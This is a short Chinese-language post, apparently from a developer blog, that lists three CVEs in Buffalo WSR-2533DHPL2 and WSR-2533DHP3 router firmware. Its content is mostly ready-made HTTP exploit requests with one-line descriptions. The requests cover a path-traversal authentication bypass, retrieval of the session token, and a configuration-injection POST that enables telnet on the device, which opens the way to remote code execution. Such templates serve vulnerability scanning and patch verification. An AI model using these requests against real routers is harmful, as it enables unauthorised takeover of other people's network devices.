Buffalo WSR-2533DHPL2 漏洞

2021-10-18 16:09:00 浏览数 (1)

CVE-2021-20090

Buffalo WSR-2533DHPL2 - 路径遍历

Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面中的路径遍历漏洞可能允许未经身份验证的远程攻击者绕过身份验证。

代码语言:javascript复制
GET /images/../info.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html

CVE-2021-20092

Buffalo WSR-2533DHPL2 - 未授权访问

Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面没有正确限制未经授权的参与者访问敏感信息。

代码语言:javascript复制
        GET /images/../info.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
      - |
        GET /images/../cgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: lang=8; url=ping.html; mobile=false;
        Referer: {{BaseURL}}/info.html
        Content-Type: application/x-www-form-urlencoded

CVE-2021-20091

Buffalo WSR-2533DHPL2 - 配置文件注入

Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面无法正确清理用户输入。经过身份验证的远程攻击者可以利用此漏洞来更改设备配置,从而有可能获得远程代码执行。

代码语言:javascript复制
        GET /images/../info.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html

        POST /images/../apply_abstract.cgi HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
        Content-Type: application/x-www-form-urlencoded
        action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time=5&ARC_ping_ipaddress=127.0.0.1
ARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
 

0 人点赞